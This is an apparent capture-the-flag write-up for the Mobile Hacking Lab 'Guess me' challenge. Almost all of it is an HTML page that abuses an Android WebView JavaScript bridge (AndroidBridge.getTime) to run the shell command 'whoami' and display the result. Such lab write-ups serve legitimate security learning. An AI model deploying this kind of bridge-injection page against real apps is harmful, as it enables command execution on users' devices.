Guess me
Hello everyone , In this blog post , I will try to explain my solution steps for Guess me challenge from Mobile Hacking Lab Platform . i hope it will be useful for you

image.png 

<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <p id="result">Thank you for visiting</p> <!-- Add a hyperlink with onclick event --> <a href="#" onclick="executeCommand()">Execute Command</a> <script> function executeCommand() { try { var result = AndroidBridge.getTime("whoami"); var lines = result.split('\\n'); var timeVisited = lines[0]; var fullMessage = "Command: " + timeVisited; document.getElementById('result').innerText = fullMessage; window.location.href = "https://www.mobilehackinglab.com/"; } catch (e) { console.error("Error calling getTime:", e); } } </script> </body> </html>

Last updated




